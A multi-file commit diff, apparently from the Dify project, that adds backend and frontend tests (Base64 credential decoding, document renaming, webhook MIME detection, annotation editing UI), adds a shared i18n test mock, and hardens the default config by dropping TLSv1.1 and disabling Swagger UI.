def test_decode_code_invalid_returns_none(self):
"""Test that invalid base64 codes return None."""
invalid = "123456" # Plain 6-digit code, not base64
result = FieldEncryption.decrypt_verification_code(invalid)
# Should return None (decoding failed)
assert result is None
class TestRoundTripEncodingDecoding:
"""
Integration tests for complete encoding-decoding cycle.
These tests simulate the full frontend-to-backend flow using Base64.
"""
def test_roundtrip_password(self):
"""Test encoding and decoding a password."""
original_password = "SecureP@ssw0rd!"
# Simulate frontend encoding (Base64)
encoded = base64.b64encode(original_password.encode("utf-8")).decode()
# Backend decoding
decoded = FieldEncryption.decrypt_password(encoded)
assert decoded == original_password
def test_roundtrip_verification_code(self):
"""Test encoding and decoding a verification code."""
original_code = "123456"
# Simulate frontend encoding
encoded = base64.b64encode(original_code.encode("utf-8")).decode()
# Backend decoding
decoded = FieldEncryption.decrypt_verification_code(encoded)
assert decoded == original_code
def test_roundtrip_unicode_password(self):
"""Test encoding and decoding password with Unicode characters."""
original_password = "密码Test123!@#"
# Frontend encoding
encoded = base64.b64encode(original_password.encode("utf-8")).decode()
# Backend decoding
decoded = FieldEncryption.decrypt_password(encoded)
assert decoded == original_password
def test_roundtrip_long_password(self):
"""Test encoding and decoding a long password."""
original_password = "ThisIsAVeryLongPasswordWithLotsOfCharacters123!@#$%^&*()"
encoded = base64.b64encode(original_password.encode("utf-8")).decode()
decoded = FieldEncryption.decrypt_password(encoded)
assert decoded == original_password
def test_roundtrip_with_whitespace(self):
"""Test encoding and decoding with whitespace."""
original_password = "pass word with spaces"
encoded = base64.b64encode(original_password.encode("utf-8")).decode()
decoded = FieldEncryption.decrypt_field(encoded)
assert decoded == original_password

View File

@ -0,0 +1,176 @@
from types import SimpleNamespace
from unittest.mock import Mock, create_autospec, patch
import pytest
from models import Account
from services.dataset_service import DocumentService
@pytest.fixture
def mock_env():
"""Patch dependencies used by DocumentService.rename_document.
Mocks:
- DatasetService.get_dataset
- DocumentService.get_document
- current_user (with current_tenant_id)
- db.session
"""
with (
patch("services.dataset_service.DatasetService.get_dataset") as get_dataset,
patch("services.dataset_service.DocumentService.get_document") as get_document,
patch("services.dataset_service.current_user", create_autospec(Account, instance=True)) as current_user,
patch("extensions.ext_database.db.session") as db_session,
):
current_user.current_tenant_id = "tenant-123"
yield {
"get_dataset": get_dataset,
"get_document": get_document,
"current_user": current_user,
"db_session": db_session,
}
def make_dataset(dataset_id="dataset-123", tenant_id="tenant-123", built_in_field_enabled=False):
return SimpleNamespace(id=dataset_id, tenant_id=tenant_id, built_in_field_enabled=built_in_field_enabled)
def make_document(
document_id="document-123",
dataset_id="dataset-123",
tenant_id="tenant-123",
name="Old Name",
data_source_info=None,
doc_metadata=None,
):
doc = Mock()
doc.id = document_id
doc.dataset_id = dataset_id
doc.tenant_id = tenant_id
doc.name = name
doc.data_source_info = data_source_info or {}
# property-like usage in code relies on a dict
doc.data_source_info_dict = dict(doc.data_source_info)
doc.doc_metadata = dict(doc_metadata or {})
return doc
def test_rename_document_success(mock_env):
dataset_id = "dataset-123"
document_id = "document-123"
new_name = "New Document Name"
dataset = make_dataset(dataset_id)
document = make_document(document_id=document_id, dataset_id=dataset_id)
mock_env["get_dataset"].return_value = dataset
mock_env["get_document"].return_value = document
result = DocumentService.rename_document(dataset_id, document_id, new_name)
assert result is document
assert document.name == new_name
mock_env["db_session"].add.assert_called_once_with(document)
mock_env["db_session"].commit.assert_called_once()
def test_rename_document_with_built_in_fields(mock_env):
dataset_id = "dataset-123"
document_id = "document-123"
new_name = "Renamed"
dataset = make_dataset(dataset_id, built_in_field_enabled=True)
document = make_document(document_id=document_id, dataset_id=dataset_id, doc_metadata={"foo": "bar"})
mock_env["get_dataset"].return_value = dataset
mock_env["get_document"].return_value = document
DocumentService.rename_document(dataset_id, document_id, new_name)
assert document.name == new_name
# BuiltInField.document_name == "document_name" in service code
assert document.doc_metadata["document_name"] == new_name
assert document.doc_metadata["foo"] == "bar"
def test_rename_document_updates_upload_file_when_present(mock_env):
dataset_id = "dataset-123"
document_id = "document-123"
new_name = "Renamed"
file_id = "file-123"
dataset = make_dataset(dataset_id)
document = make_document(
document_id=document_id,
dataset_id=dataset_id,
data_source_info={"upload_file_id": file_id},
)
mock_env["get_dataset"].return_value = dataset
mock_env["get_document"].return_value = document
# Intercept UploadFile rename UPDATE chain
mock_query = Mock()
mock_query.where.return_value = mock_query
mock_env["db_session"].query.return_value = mock_query
DocumentService.rename_document(dataset_id, document_id, new_name)
assert document.name == new_name
mock_env["db_session"].query.assert_called() # update executed
def test_rename_document_does_not_update_upload_file_when_missing_id(mock_env):
"""
When data_source_info_dict exists but does not contain "upload_file_id",
UploadFile should not be updated.
"""
dataset_id = "dataset-123"
document_id = "document-123"
new_name = "Another Name"
dataset = make_dataset(dataset_id)
# Ensure data_source_info_dict is truthy but lacks the key
document = make_document(
document_id=document_id,
dataset_id=dataset_id,
data_source_info={"url": "https://example.com"},
)
mock_env["get_dataset"].return_value = dataset
mock_env["get_document"].return_value = document
DocumentService.rename_document(dataset_id, document_id, new_name)
assert document.name == new_name
# Should NOT attempt to update UploadFile
mock_env["db_session"].query.assert_not_called()
def test_rename_document_dataset_not_found(mock_env):
mock_env["get_dataset"].return_value = None
with pytest.raises(ValueError, match="Dataset not found"):
DocumentService.rename_document("missing", "doc", "x")
def test_rename_document_not_found(mock_env):
dataset = make_dataset("dataset-123")
mock_env["get_dataset"].return_value = dataset
mock_env["get_document"].return_value = None
with pytest.raises(ValueError, match="Document not found"):
DocumentService.rename_document(dataset.id, "missing", "x")
def test_rename_document_permission_denied_when_tenant_mismatch(mock_env):
dataset = make_dataset("dataset-123")
# different tenant than current_user.current_tenant_id
document = make_document(dataset_id=dataset.id, tenant_id="tenant-other")
mock_env["get_dataset"].return_value = dataset
mock_env["get_document"].return_value = document
with pytest.raises(ValueError, match="No permission"):
DocumentService.rename_document(dataset.id, document.id, "x")

View File

@ -518,6 +518,55 @@ class TestEdgeCases:
assert isinstance(result.result, StringSegment)
class TestTruncateJsonPrimitives:
"""Test _truncate_json_primitives method with different data types."""
@pytest.fixture
def truncator(self):
return VariableTruncator()
def test_truncate_json_primitives_file_type(self, truncator, file):
"""Test that File objects are handled correctly in _truncate_json_primitives."""
# Test File object is returned as-is without truncation
result = truncator._truncate_json_primitives(file, 1000)
assert result.value == file
assert result.truncated is False
# Size should be calculated correctly
expected_size = VariableTruncator.calculate_json_size(file)
assert result.value_size == expected_size
def test_truncate_json_primitives_file_type_small_budget(self, truncator, file):
"""Test that File objects are returned as-is even with small budget."""
# Even with a small size budget, File objects should not be truncated
result = truncator._truncate_json_primitives(file, 10)
assert result.value == file
assert result.truncated is False
def test_truncate_json_primitives_file_type_in_array(self, truncator, file):
"""Test File objects in arrays are handled correctly."""
array_with_files = [file, file]
result = truncator._truncate_json_primitives(array_with_files, 1000)
assert isinstance(result.value, list)
assert len(result.value) == 2
assert result.value[0] == file
assert result.value[1] == file
assert result.truncated is False
def test_truncate_json_primitives_file_type_in_object(self, truncator, file):
"""Test File objects in objects are handled correctly."""
obj_with_files = {"file1": file, "file2": file}
result = truncator._truncate_json_primitives(obj_with_files, 1000)
assert isinstance(result.value, dict)
assert len(result.value) == 2
assert result.value["file1"] == file
assert result.value["file2"] == file
assert result.truncated is False
class TestIntegrationScenarios:
"""Test realistic integration scenarios."""

View File

@ -82,19 +82,19 @@ class TestWebhookServiceUnit:
"/webhook",
method="POST",
headers={"Content-Type": "multipart/form-data"},
data={"message": "test", "upload": file_storage},
data={"message": "test", "file": file_storage},
):
webhook_trigger = MagicMock()
webhook_trigger.tenant_id = "test_tenant"
with patch.object(WebhookService, "_process_file_uploads") as mock_process_files:
mock_process_files.return_value = {"upload": "mocked_file_obj"}
mock_process_files.return_value = {"file": "mocked_file_obj"}
webhook_data = WebhookService.extract_webhook_data(webhook_trigger)
assert webhook_data["method"] == "POST"
assert webhook_data["body"]["message"] == "test"
assert webhook_data["files"]["upload"] == "mocked_file_obj"
assert webhook_data["files"]["file"] == "mocked_file_obj"
mock_process_files.assert_called_once()
def test_extract_webhook_data_raw_text(self):
@ -110,6 +110,70 @@ class TestWebhookServiceUnit:
assert webhook_data["method"] == "POST"
assert webhook_data["body"]["raw"] == "raw text content"
def test_extract_octet_stream_body_uses_detected_mime(self):
"""Octet-stream uploads should rely on detected MIME type."""
app = Flask(__name__)
binary_content = b"plain text data"
with app.test_request_context(
"/webhook", method="POST", headers={"Content-Type": "application/octet-stream"}, data=binary_content
):
webhook_trigger = MagicMock()
mock_file = MagicMock()
mock_file.to_dict.return_value = {"file": "data"}
with (
patch.object(WebhookService, "_detect_binary_mimetype", return_value="text/plain") as mock_detect,
patch.object(WebhookService, "_create_file_from_binary") as mock_create,
):
mock_create.return_value = mock_file
body, files = WebhookService._extract_octet_stream_body(webhook_trigger)
assert body["raw"] == {"file": "data"}
assert files == {}
mock_detect.assert_called_once_with(binary_content)
mock_create.assert_called_once()
args = mock_create.call_args[0]
assert args[0] == binary_content
assert args[1] == "text/plain"
assert args[2] is webhook_trigger
def test_detect_binary_mimetype_uses_magic(self, monkeypatch):
"""python-magic output should be used when available."""
fake_magic = MagicMock()
fake_magic.from_buffer.return_value = "image/png"
monkeypatch.setattr("services.trigger.webhook_service.magic", fake_magic)
result = WebhookService._detect_binary_mimetype(b"binary data")
assert result == "image/png"
fake_magic.from_buffer.assert_called_once()
def test_detect_binary_mimetype_fallback_without_magic(self, monkeypatch):
"""Fallback MIME type should be used when python-magic is unavailable."""
monkeypatch.setattr("services.trigger.webhook_service.magic", None)
result = WebhookService._detect_binary_mimetype(b"binary data")
assert result == "application/octet-stream"
def test_detect_binary_mimetype_handles_magic_exception(self, monkeypatch):
"""Fallback MIME type should be used when python-magic raises an exception."""
try:
import magic as real_magic
except ImportError:
pytest.skip("python-magic is not installed")
fake_magic = MagicMock()
fake_magic.from_buffer.side_effect = real_magic.MagicException("magic error")
monkeypatch.setattr("services.trigger.webhook_service.magic", fake_magic)
with patch("services.trigger.webhook_service.logger") as mock_logger:
result = WebhookService._detect_binary_mimetype(b"binary data")
assert result == "application/octet-stream"
mock_logger.debug.assert_called_once()
def test_extract_webhook_data_invalid_json(self):
"""Test webhook data extraction with invalid JSON."""
app = Flask(__name__)

View File

@ -1229,7 +1229,7 @@ NGINX_SSL_PORT=443
# and modify the env vars below accordingly.
NGINX_SSL_CERT_FILENAME=dify.crt
NGINX_SSL_CERT_KEY_FILENAME=dify.key
NGINX_SSL_PROTOCOLS=TLSv1.1 TLSv1.2 TLSv1.3
NGINX_SSL_PROTOCOLS=TLSv1.2 TLSv1.3
# Nginx performance tuning
NGINX_WORKER_PROCESSES=auto
@ -1421,7 +1421,7 @@ QUEUE_MONITOR_ALERT_EMAILS=
QUEUE_MONITOR_INTERVAL=30
# Swagger UI configuration
SWAGGER_UI_ENABLED=true
SWAGGER_UI_ENABLED=false
SWAGGER_UI_PATH=/swagger-ui.html
# Whether to encrypt dataset IDs when exporting DSL files (default: true)
@ -1461,4 +1461,4 @@ ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20
ANNOTATION_IMPORT_MAX_CONCURRENT=5
# The API key of amplitude
AMPLITUDE_API_KEY=
AMPLITUDE_API_KEY=

View File

@ -414,7 +414,7 @@ services:
# and modify the env vars below in .env if HTTPS_ENABLED is true.
NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt}
NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key}
NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3}
NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3}
NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto}
NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M}
NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65}

View File

@ -528,7 +528,7 @@ x-shared-env: &shared-api-worker-env
NGINX_SSL_PORT: ${NGINX_SSL_PORT:-443}
NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt}
NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key}
NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3}
NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3}
NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto}
NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M}
NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65}
@ -631,7 +631,7 @@ x-shared-env: &shared-api-worker-env
QUEUE_MONITOR_THRESHOLD: ${QUEUE_MONITOR_THRESHOLD:-200}
QUEUE_MONITOR_ALERT_EMAILS: ${QUEUE_MONITOR_ALERT_EMAILS:-}
QUEUE_MONITOR_INTERVAL: ${QUEUE_MONITOR_INTERVAL:-30}
SWAGGER_UI_ENABLED: ${SWAGGER_UI_ENABLED:-true}
SWAGGER_UI_ENABLED: ${SWAGGER_UI_ENABLED:-false}
SWAGGER_UI_PATH: ${SWAGGER_UI_PATH:-/swagger-ui.html}
DSL_EXPORT_ENCRYPT_DATASET_ID: ${DSL_EXPORT_ENCRYPT_DATASET_ID:-true}
DATASET_MAX_SEGMENTS_PER_REQUEST: ${DATASET_MAX_SEGMENTS_PER_REQUEST:-0}
@ -1072,7 +1072,7 @@ services:
# and modify the env vars below in .env if HTTPS_ENABLED is true.
NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt}
NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key}
NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3}
NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3}
NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto}
NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M}
NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65}

View File

@ -2,3 +2,4 @@
- Use `web/testing/testing.md` as the canonical instruction set for generating frontend automated tests.
- When proposing or saving tests, re-read that document and follow every requirement.
- All frontend tests MUST also comply with the `frontend-testing` skill. Treat the skill as a mandatory constraint, not optional guidance.

1
web/CLAUDE.md Symbolic link
View File

@ -0,0 +1 @@
AGENTS.md

View File

@ -0,0 +1,40 @@
/**
* Shared mock for react-i18next
*
* Jest automatically uses this mock when react-i18next is imported in tests.
* The default behavior returns the translation key as-is, which is suitable
* for most test scenarios.
*
* For tests that need custom translations, you can override with jest.mock():
*
* @example
* jest.mock('react-i18next', () => ({
* useTranslation: () => ({
* t: (key: string) => {
* if (key === 'some.key') return 'Custom translation'
* return key
* },
* }),
* }))
*/
export const useTranslation = () => ({
t: (key: string, options?: Record<string, unknown>) => {
if (options?.returnObjects)
return [`${key}-feature-1`, `${key}-feature-2`]
if (options)
return `${key}:${JSON.stringify(options)}`
return key
},
i18n: {
language: 'en',
changeLanguage: jest.fn(),
},
})
export const Trans = ({ children }: { children?: React.ReactNode }) => children
export const initReactI18next = {
type: '3rdParty',
init: jest.fn(),
}

View File

@ -4,12 +4,6 @@ import { fireEvent, render, screen, waitFor } from '@testing-library/react'
import MailAndPasswordAuth from '@/app/(shareLayout)/webapp-signin/components/mail-and-password-auth'
import CheckCode from '@/app/(shareLayout)/webapp-signin/check-code/page'
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
const replaceMock = jest.fn()
const backMock = jest.fn()

View File

@ -4,12 +4,6 @@ import '@testing-library/jest-dom'
import CommandSelector from '../../app/components/goto-anything/command-selector'
import type { ActionItem } from '../../app/components/goto-anything/actions/types'
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
jest.mock('cmdk', () => ({
Command: {
Group: ({ children, className }: any) => <div className={className}>{children}</div>,

View File

@ -3,13 +3,6 @@ import { render } from '@testing-library/react'
import '@testing-library/jest-dom'
import { OpikIconBig } from '@/app/components/base/icons/src/public/tracing'
// Mock dependencies to isolate the SVG rendering issue
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
describe('SVG Attribute Error Reproduction', () => {
// Capture console errors
const originalError = console.error

View File

@ -3,12 +3,6 @@ import { fireEvent, render, screen, waitFor } from '@testing-library/react'
import CSVUploader, { type Props } from './csv-uploader'
import { ToastContext } from '@/app/components/base/toast'
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
describe('CSVUploader', () => {
const notify = jest.fn()
const updateFile = jest.fn()

View File

@ -0,0 +1,397 @@
import { render, screen } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import EditItem, { EditItemType, EditTitle } from './index'
describe('EditTitle', () => {
it('should render title content correctly', () => {
// Arrange
const props = { title: 'Test Title' }
// Act
render(<EditTitle {...props} />)
// Assert
expect(screen.getByText(/test title/i)).toBeInTheDocument()
// Should contain edit icon (svg element)
expect(document.querySelector('svg')).toBeInTheDocument()
})
it('should apply custom className when provided', () => {
// Arrange
const props = {
title: 'Test Title',
className: 'custom-class',
}
// Act
const { container } = render(<EditTitle {...props} />)
// Assert
expect(screen.getByText(/test title/i)).toBeInTheDocument()
expect(container.querySelector('.custom-class')).toBeInTheDocument()
})
})
describe('EditItem', () => {
const defaultProps = {
type: EditItemType.Query,
content: 'Test content',
onSave: jest.fn(),
}
beforeEach(() => {
jest.clearAllMocks()
})
// Rendering tests (REQUIRED)
describe('Rendering', () => {
it('should render content correctly', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<EditItem {...props} />)
// Assert
expect(screen.getByText(/test content/i)).toBeInTheDocument()
// Should show item name (query or answer)
expect(screen.getByText('appAnnotation.editModal.queryName')).toBeInTheDocument()
})
it('should render different item types correctly', () => {
// Arrange
const props = {
...defaultProps,
type: EditItemType.Answer,
content: 'Answer content',
}
// Act
render(<EditItem {...props} />)
// Assert
expect(screen.getByText(/answer content/i)).toBeInTheDocument()
expect(screen.getByText('appAnnotation.editModal.answerName')).toBeInTheDocument()
})
it('should show edit controls when not readonly', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<EditItem {...props} />)
// Assert
expect(screen.getByText('common.operation.edit')).toBeInTheDocument()
})
it('should hide edit controls when readonly', () => {
// Arrange
const props = {
...defaultProps,
readonly: true,
}
// Act
render(<EditItem {...props} />)
// Assert
expect(screen.queryByText('common.operation.edit')).not.toBeInTheDocument()
})
})
// Props tests (REQUIRED)
describe('Props', () => {
it('should respect readonly prop for edit functionality', () => {
// Arrange
const props = {
...defaultProps,
readonly: true,
}
// Act
render(<EditItem {...props} />)
// Assert
expect(screen.getByText(/test content/i)).toBeInTheDocument()
expect(screen.queryByText('common.operation.edit')).not.toBeInTheDocument()
})
it('should display provided content', () => {
// Arrange
const props = {
...defaultProps,
content: 'Custom content for testing',
}
// Act
render(<EditItem {...props} />)
// Assert
expect(screen.getByText(/custom content for testing/i)).toBeInTheDocument()
})
it('should render appropriate content based on type', () => {
// Arrange
const props = {
...defaultProps,
type: EditItemType.Query,
content: 'Question content',
}
// Act
render(<EditItem {...props} />)
// Assert
expect(screen.getByText(/question content/i)).toBeInTheDocument()
expect(screen.getByText('appAnnotation.editModal.queryName')).toBeInTheDocument()
})
})
// User Interactions
describe('User Interactions', () => {
it('should activate edit mode when edit button is clicked', async () => {
// Arrange
const props = { ...defaultProps }
const user = userEvent.setup()
// Act
render(<EditItem {...props} />)
await user.click(screen.getByText('common.operation.edit'))
// Assert
expect(screen.getByRole('textbox')).toBeInTheDocument()
expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument()
expect(screen.getByRole('button', { name: 'common.operation.cancel' })).toBeInTheDocument()
})
it('should save new content when save button is clicked', async () => {
// Arrange
const mockSave = jest.fn().mockResolvedValue(undefined)
const props = {
...defaultProps,
onSave: mockSave,
}
const user = userEvent.setup()
// Act
render(<EditItem {...props} />)
await user.click(screen.getByText('common.operation.edit'))
// Type new content
const textarea = screen.getByRole('textbox')
await user.clear(textarea)
await user.type(textarea, 'Updated content')
// Save
await user.click(screen.getByRole('button', { name: 'common.operation.save' }))
// Assert
expect(mockSave).toHaveBeenCalledWith('Updated content')
})
it('should exit edit mode when cancel button is clicked', async () => {
// Arrange
const props = { ...defaultProps }
const user = userEvent.setup()
// Act
render(<EditItem {...props} />)
await user.click(screen.getByText('common.operation.edit'))
await user.click(screen.getByRole('button', { name: 'common.operation.cancel' }))
// Assert
expect(screen.queryByRole('textbox')).not.toBeInTheDocument()
expect(screen.getByText(/test content/i)).toBeInTheDocument()
})
it('should show content preview while typing', async () => {
// Arrange
const props = { ...defaultProps }
const user = userEvent.setup()
// Act
render(<EditItem {...props} />)
await user.click(screen.getByText('common.operation.edit'))
const textarea = screen.getByRole('textbox')
await user.type(textarea, 'New content')
// Assert
expect(screen.getByText(/new content/i)).toBeInTheDocument()
})
it('should call onSave with correct content when saving', async () => {
// Arrange
const mockSave = jest.fn().mockResolvedValue(undefined)
const props = {
...defaultProps,
onSave: mockSave,
}
const user = userEvent.setup()
// Act
render(<EditItem {...props} />)
await user.click(screen.getByText('common.operation.edit'))
const textarea = screen.getByRole('textbox')
await user.clear(textarea)
await user.type(textarea, 'Test save content')
// Save
await user.click(screen.getByRole('button', { name: 'common.operation.save' }))
// Assert
expect(mockSave).toHaveBeenCalledWith('Test save content')
})
it('should show delete option when content changes', async () => {
// Arrange
const mockSave = jest.fn().mockResolvedValue(undefined)
const props = {
...defaultProps,
onSave: mockSave,
}
const user = userEvent.setup()
// Act
render(<EditItem {...props} />)
// Enter edit mode and change content
await user.click(screen.getByText('common.operation.edit'))
const textarea = screen.getByRole('textbox')
await user.clear(textarea)
await user.type(textarea, 'Modified content')
// Save to trigger content change
await user.click(screen.getByRole('button', { name: 'common.operation.save' }))
// Assert
expect(mockSave).toHaveBeenCalledWith('Modified content')
})
it('should handle keyboard interactions in edit mode', async () => {
// Arrange
const props = { ...defaultProps }
const user = userEvent.setup()
// Act
render(<EditItem {...props} />)
await user.click(screen.getByText('common.operation.edit'))
const textarea = screen.getByRole('textbox')
// Test typing
await user.type(textarea, 'Keyboard test')
// Assert
expect(textarea).toHaveValue('Keyboard test')
expect(screen.getByText(/keyboard test/i)).toBeInTheDocument()
})
})
// State Management
describe('State Management', () => {
it('should reset newContent when content prop changes', async () => {
// Arrange
const { rerender } = render(<EditItem {...defaultProps} />)
// Act - Enter edit mode and type something
const user = userEvent.setup()
await user.click(screen.getByText('common.operation.edit'))
const textarea = screen.getByRole('textbox')
await user.clear(textarea)
await user.type(textarea, 'New content')
// Rerender with new content prop
rerender(<EditItem {...defaultProps} content="Updated content" />)
// Assert - Textarea value should be reset due to useEffect
expect(textarea).toHaveValue('')
})
it('should preserve edit state across content changes', async () => {
// Arrange
const { rerender } = render(<EditItem {...defaultProps} />)
const user = userEvent.setup()
// Act - Enter edit mode
await user.click(screen.getByText('common.operation.edit'))
// Rerender with new content
rerender(<EditItem {...defaultProps} content="Updated content" />)
// Assert - Should still be in edit mode
expect(screen.getByRole('textbox')).toBeInTheDocument()
})
})
// Edge Cases (REQUIRED)
describe('Edge Cases', () => {
it('should handle empty content', () => {
// Arrange
const props = {
...defaultProps,
content: '',
}
// Act
const { container } = render(<EditItem {...props} />)
// Assert - Should render without crashing
// Check that the component renders properly with empty content
expect(container.querySelector('.grow')).toBeInTheDocument()
// Should still show edit button
expect(screen.getByText('common.operation.edit')).toBeInTheDocument()
})
it('should handle very long content', () => {
// Arrange
const longContent = 'A'.repeat(1000)
const props = {
...defaultProps,
content: longContent,
}
// Act
render(<EditItem {...props} />)
// Assert
expect(screen.getByText(longContent)).toBeInTheDocument()
})
it('should handle content with special characters', () => {
// Arrange
const specialContent = 'Content with & < > " \' characters'
const props = {
...defaultProps,
content: specialContent,
}
// Act
render(<EditItem {...props} />)
// Assert
expect(screen.getByText(specialContent)).toBeInTheDocument()
})
it('should handle rapid edit/cancel operations', async () => {
// Arrange
const props = { ...defaultProps }
const user = userEvent.setup()
// Act
render(<EditItem {...props} />)
// Rapid edit/cancel operations
await user.click(screen.getByText('common.operation.edit'))
await user.click(screen.getByText('common.operation.cancel'))
await user.click(screen.getByText('common.operation.edit'))
await user.click(screen.getByText('common.operation.cancel'))
// Assert
expect(screen.queryByRole('textbox')).not.toBeInTheDocument()
expect(screen.getByText('Test content')).toBeInTheDocument()
})
})
})

View File

@ -0,0 +1,408 @@
import { render, screen } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import Toast, { type IToastProps, type ToastHandle } from '@/app/components/base/toast'
import EditAnnotationModal from './index'
// Mock only external dependencies
jest.mock('@/service/annotation', () => ({
addAnnotation: jest.fn(),
editAnnotation: jest.fn(),
}))
jest.mock('@/context/provider-context', () => ({
useProviderContext: () => ({
plan: {
usage: { annotatedResponse: 5 },
total: { annotatedResponse: 10 },
},
enableBilling: true,
}),
}))
jest.mock('@/hooks/use-timestamp', () => ({
__esModule: true,
default: () => ({
formatTime: () => '2023-12-01 10:30:00',
}),
}))
// Note: i18n is automatically mocked by Jest via __mocks__/react-i18next.ts
jest.mock('@/app/components/billing/annotation-full', () => ({
__esModule: true,
default: () => <div data-testid="annotation-full" />,
}))
type ToastNotifyProps = Pick<IToastProps, 'type' | 'size' | 'message' | 'duration' | 'className' | 'customComponent' | 'onClose'>
type ToastWithNotify = typeof Toast & { notify: (props: ToastNotifyProps) => ToastHandle }
const toastWithNotify = Toast as unknown as ToastWithNotify
const toastNotifySpy = jest.spyOn(toastWithNotify, 'notify').mockReturnValue({ clear: jest.fn() })
const { addAnnotation: mockAddAnnotation, editAnnotation: mockEditAnnotation } = jest.requireMock('@/service/annotation') as {
addAnnotation: jest.Mock
editAnnotation: jest.Mock
}
describe('EditAnnotationModal', () => {
const defaultProps = {
isShow: true,
onHide: jest.fn(),
appId: 'test-app-id',
query: 'Test query',
answer: 'Test answer',
onEdited: jest.fn(),
onAdded: jest.fn(),
onRemove: jest.fn(),
}
afterAll(() => {
toastNotifySpy.mockRestore()
})
beforeEach(() => {
jest.clearAllMocks()
mockAddAnnotation.mockResolvedValue({
id: 'test-id',
account: { name: 'Test User' },
})
mockEditAnnotation.mockResolvedValue({})
})
// Rendering tests (REQUIRED)
describe('Rendering', () => {
it('should render modal when isShow is true', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<EditAnnotationModal {...props} />)
// Assert - Check for modal title as it appears in the mock
expect(screen.getByText('appAnnotation.editModal.title')).toBeInTheDocument()
})
it('should not render modal when isShow is false', () => {
// Arrange
const props = { ...defaultProps, isShow: false }
// Act
render(<EditAnnotationModal {...props} />)
// Assert
expect(screen.queryByText('appAnnotation.editModal.title')).not.toBeInTheDocument()
})
it('should display query and answer sections', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<EditAnnotationModal {...props} />)
// Assert - Look for query and answer content
expect(screen.getByText('Test query')).toBeInTheDocument()
expect(screen.getByText('Test answer')).toBeInTheDocument()
})
})
// Props tests (REQUIRED)
describe('Props', () => {
it('should handle different query and answer content', () => {
// Arrange
const props = {
...defaultProps,
query: 'Custom query content',
answer: 'Custom answer content',
}
// Act
render(<EditAnnotationModal {...props} />)
// Assert - Check content is displayed
expect(screen.getByText('Custom query content')).toBeInTheDocument()
expect(screen.getByText('Custom answer content')).toBeInTheDocument()
})
it('should show remove option when annotationId is provided', () => {
// Arrange
const props = {
...defaultProps,
annotationId: 'test-annotation-id',
}
// Act
render(<EditAnnotationModal {...props} />)
// Assert - Remove option should be present (using pattern)
expect(screen.getByText('appAnnotation.editModal.removeThisCache')).toBeInTheDocument()
})
})
// User Interactions
describe('User Interactions', () => {
it('should enable editing for query and answer sections', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<EditAnnotationModal {...props} />)
// Assert - Edit links should be visible (using text content)
const editLinks = screen.getAllByText(/common\.operation\.edit/i)
expect(editLinks).toHaveLength(2)
})
it('should show remove option when annotationId is provided', () => {
// Arrange
const props = {
...defaultProps,
annotationId: 'test-annotation-id',
}
// Act
render(<EditAnnotationModal {...props} />)
// Assert
expect(screen.getByText('appAnnotation.editModal.removeThisCache')).toBeInTheDocument()
})
it('should save content when edited', async () => {
// Arrange
const mockOnAdded = jest.fn()
const props = {
...defaultProps,
onAdded: mockOnAdded,
}
const user = userEvent.setup()
// Mock API response
mockAddAnnotation.mockResolvedValueOnce({
id: 'test-annotation-id',
account: { name: 'Test User' },
})
// Act
render(<EditAnnotationModal {...props} />)
// Find and click edit link for query
const editLinks = screen.getAllByText(/common\.operation\.edit/i)
await user.click(editLinks[0])
// Find textarea and enter new content
const textarea = screen.getByRole('textbox')
await user.clear(textarea)
await user.type(textarea, 'New query content')
// Click save button
const saveButton = screen.getByRole('button', { name: 'common.operation.save' })
await user.click(saveButton)
// Assert
expect(mockAddAnnotation).toHaveBeenCalledWith('test-app-id', {
question: 'New query content',
answer: 'Test answer',
message_id: undefined,
})
})
})
// API Calls
describe('API Calls', () => {
it('should call addAnnotation when saving new annotation', async () => {
// Arrange
const mockOnAdded = jest.fn()
const props = {
...defaultProps,
onAdded: mockOnAdded,
}
const user = userEvent.setup()
